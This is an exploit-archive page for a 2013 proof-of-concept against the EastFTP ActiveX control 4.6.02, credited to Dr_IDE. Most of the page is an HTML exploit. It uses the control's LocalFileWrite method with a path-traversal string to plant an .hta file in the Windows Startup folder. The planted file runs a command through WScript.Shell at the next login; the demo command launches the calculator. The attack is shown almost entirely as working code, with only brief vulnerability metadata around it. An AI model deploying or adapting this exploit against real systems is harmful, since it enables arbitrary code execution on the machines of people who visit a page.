EastFTP ActiveX Control 0Day

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EastFTP ActiveX Control 0Day
# Published : 2013-03-20
# Author :
# Previous Title : Photodex ProShow Producer v5.0.3310 ScsiAccess - Local Privilege Escalation
# Next Title : Google AD Sync Tool - Exposure of Sensitive Information Vulnerability

#################################################################
#
# EastFTP ActiveX Control 0Day
# By: Dr_IDE
# Vendor Homepage:http://www.ftpocx.com/download.htm
# Version: 4.6.02
#
# Self Promotion: http://irresponsibledisclosure.blogspot.com
#################################################################

<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target'/></object>
<script>
var sofa = "..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\the_doctor_is_in.hta";
var king = "><" + "SCRIPT> var x=new ActiveXObject("WScript.Shell"); x.Exec("CALC.EXE"); <" +"/SCRIPT>";
var easy = 1;
target.LocalFileWrite(sofa,king,easy);
</script>
<body>
EaseFTP ActiveX Control 0-Day Local Exploit<br>
By: Dr_IDE<br>
Self Promotion: http://irresponsibledisclosure.blogspot.com<br>
Vendor Homepage:http://www.ftpocx.com/download.htm<br>
Version: 4.6.02<br>
Class FtpLibrary<br>
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
</body>
</html>